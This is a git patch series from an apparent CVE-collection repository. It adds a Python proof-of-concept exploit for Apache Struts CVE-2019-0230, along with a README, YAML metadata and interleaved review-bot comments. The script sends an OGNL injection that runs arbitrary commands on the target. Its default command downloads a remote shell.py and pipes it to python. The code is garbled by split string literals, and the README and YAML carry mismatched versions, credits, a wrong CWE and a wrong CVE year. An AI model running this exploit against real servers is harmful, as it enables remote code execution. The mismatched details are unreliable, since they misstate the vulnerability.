From 6d9a4f5e1fa6a00b47e8ea20ba9460a53e6d129b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:08:53 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From bc57bcbc91971c2b9a1103e72b2cfafaad97aa33 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:29 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 698a6b303173f1c4b3d06cd5b3442d4a4791d74c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:48 +0000 Subject: [PATCH 03/19] POC Signed-off-by: fanyunpeng --- .../CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py diff --git a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 00000000..1551ebac --- /dev/null +++ b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py 
@@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', 
action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From 7ff3d23d6af60b8f34d1639ce93740e0951c4070 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:54 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7b66e6a3946f01aa9e9bae39419dc19306f9e130 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:16 +0000 Subject: [PATCH 05/19] add cve/apache-Struts/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- cve/apache-Struts/CVE-2019-0230/README.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Struts/CVE-2019-0230/README.md 
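Review bot: Several string literals in the added script are broken across physical lines with no continuation or implicit concatenation — `"(#p=new` / `java.lang.ProcessBuilder(#cmds))…`, `command='curl --insecure -sv` / `https://10.10.10.10/shell.py|python -'):`, `description='CVE-2020-0230 Struts` / `2 exploit')`, `help='Target` / `address: …'` — so the module appears not to compile as committed; the e-mail wrapping of the exploit-db mirror was imported verbatim, and the orphan `\` lines inside the `payload` assignment likely truncate the OGNL string as well. Re-join those lines, wrap the long literals in parentheses, and run `python -m py_compile CVE-2019-0230.py` before publishing a PoC. The argparse description should also name the right advisory: `description='CVE-2019-0230 Struts 2 exploit'`. Finally, the default `command` fetches a remote script over `--insecure` TLS and pipes it into `python -`; a PoC in a distro CVE corpus is safer defaulting to an inert probe such as `command='id'` and requiring `-command` for anything else.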
diff --git a/cve/apache-Struts/CVE-2019-0230/README.md b/cve/apache-Struts/CVE-2019-0230/README.md new file mode 100644 index 00000000..b9a4f94c --- /dev/null +++ b/cve/apache-Struts/CVE-2019-0230/README.md @@ -0,0 +1,21 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From b7557c40ba4feba51a93d12ea3ffc1e76e929a5e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:35 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 29e87cc776a7574cd326e9cd9c0d969ba76dda88 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:42 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From cba76fcb0fd4d42fd8d1c82a773935f577e0a45c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:11:17 +0000 Subject: [PATCH 08/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3c8957b1b665cf7cc48bc89c0b290d554cb9f467 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:11:56 +0000 Subject: [PATCH 09/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 628390144b05161cf09e38ee53291135b6c978b3 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 09:12:10 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6a382dcea0da0421f01e27b32ab0d2c676ac56ab Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:12:50 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 218ea68c1b1a63b197817ececf6d64adc7d6686d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:06 +0000 Subject: [PATCH 12/19] add cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml. Signed-off-by: fanyunpeng --- .../2019/yaml/CVE-2019-0230.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml new file mode 100644 index 00000000..e1e4a6e8 --- /dev/null +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml 
@@ -0,0 +1,24 @@ +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 -- Gitee From 6aa3620024f173fd5a0d059085947bd06f512788 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:15 +0000 Subject: [PATCH 13/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f52141ccefef0c35510e1df07a86c68ab80de33d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:36 +0000 Subject: [PATCH 14/19] add cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/README.md 
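Review bot: `cwe-id: CWE-1321` looks mis-assigned: CWE-1321 is prototype pollution (modification of JavaScript object prototype attributes), while S2-059 is OGNL expression-language injection, which is normally classified as CWE-917 (Expression Language Injection) — check the weakness NVD records for CVE-2019-0230 and use that. The `name:` field contains a product description of Struts rather than the vulnerability's name; move that sentence into `description:` and give `name:` a title such as `Apache Struts S2-059 OGNL 双重求值远程代码执行`. The Oracle reference here (`cpuApr2021`) differs from the `cpujan2021` URL used in the README added in this same series; verify which Critical Patch Update actually lists this CVE and use the same one in both places.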
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md new file mode 100644 index 00000000..b9a4f94c --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -0,0 +1,21 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From c81e0d7626d07eecc9dcf44cbd12ac02c50c1327 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:44 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From ab87e3aef5b78fca230de7bac66e103d7350d214 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:58 +0000 Subject: [PATCH 16/19] poc 
Signed-off-by: fanyunpeng
--- .../2019/CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py new file mode 100644
index 00000000..1551ebac
--- /dev/null
+++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py
@@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', 
action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From f695fbf0c813212a1ebe101f033df455f5d58a2b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:14:09 +0000 Subject: [PATCH 17/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2019-0230/CVE-2019-0230.py | 163 ------------------ cve/apache-Struts/CVE-2019-0230/README.md | 21 --- 2 files changed, 184 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py delete mode 100644 cve/apache-Struts/CVE-2019-0230/README.md diff --git a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py deleted file mode 100644 index 1551ebac..00000000 --- a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py +++ /dev/null 
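Review bot: `self.timeout = 0.5` is set in `__init__` but never passed to `session.get`/`session.post`, so `do_get` and `do_post` issue requests with no timeout and a target that accepts the connection but never answers hangs the tool; add `timeout=self.timeout` to both calls and consider a larger, configurable value, since the payload copies the spawned process's output into the response and so holds it until the command finishes. The `-debug` flag uses `action='store', default=False`, so any supplied value — including `-debug False` — is a non-empty string and turns debugging on; `action='store_true'` matches the help text. Note also that several string literals in this file (`"(#p=new` / `java.lang.ProcessBuilder(#cmds))…`, `description='CVE-2020-0230 Struts` / `2 exploit')`) are split across lines without continuation, so the module appears not to compile as committed, and the `--help` text names the wrong CVE year.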
@@ -1,163 +0,0 @@ -# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation -# Date: 08/18/2020 -# Exploit Author: West Shepherd -# Vendor Homepage: https://struts.apache.org/download.cgi -# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) -# CVE : CVE-2019-0230 -# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. -# Source(s): -# https://github.com/PrinceFPF/CVE-2019-0230 -# https://cwiki.apache.org/confluence/display/WW/S2-059 -# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 - -# !/usr/bin/python -from sys import argv, exit, stdout, stderr -import argparse -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import logging - - -class Exploit: - def __init__( - self, - target='', - redirect=False, - proxy_address='' - ): - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - self.target = target - self.session = requests.session() - self.redirect = redirect - self.timeout = 0.5 - self.proxies = { - 'http': 'http://%s' % proxy_address, - 'https': 'http://%s' % proxy_address - } \ - if proxy_address is not None \ - and proxy_address != '' else {} - self.query_params = {} - self.form_values = {} - self.cookies = {} - boundary = "---------------------------735323031399963166993862150" - self.headers = { - 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, - 'Accept': '*/*', - 'Connection': 'close' - } - payload = "%{(#nike='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?(#_memberAccess=#dm):" \ - -"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." -\ - -"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." -\ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ - -"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." -\ - -"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new -java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ - -"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." -\ - -"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." -\ - "(#ros.flush())}" - - self.payload = "--%s\r\nContent-Disposition: form-data; -name=\"foo\"; " \ - "filename=\"%s\0b\"\r\nContent-Type: -text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( - boundary, payload, boundary - ) - - def do_get(self, url, params=None, data=None): - return self.session.get( - url=url, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - data=data, - params=params - ) - - def do_post(self, url, data=None, params=None): - return self.session.post( - url=url, - data=data, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - params=params - ) - - def debug(self): - try: - import http.client as http_client - except ImportError: - import httplib as http_client - http_client.HTTPConnection.debuglevel = 1 - logging.basicConfig() - logging.getLogger().setLevel(logging.DEBUG) - requests_log = logging.getLogger("requests.packages.urllib3") - requests_log.setLevel(logging.DEBUG) - requests_log.propagate = True - return self - - def send_payload(self, command='curl --insecure -sv -https://10.10.10.10/shell.py|python -'): - url = self.target - stdout.write('sending payload to %s payload %s' % (url, command)) - resp = self.do_post(url=url, params=self.query_params, -data=self.payload.replace('{COMMAND}', command)) - return resp - - -if __name__ == '__main__': - parser = argparse.ArgumentParser(add_help=True, - description='CVE-2020-0230 Struts -2 exploit') - try: - parser.add_argument('-target', 
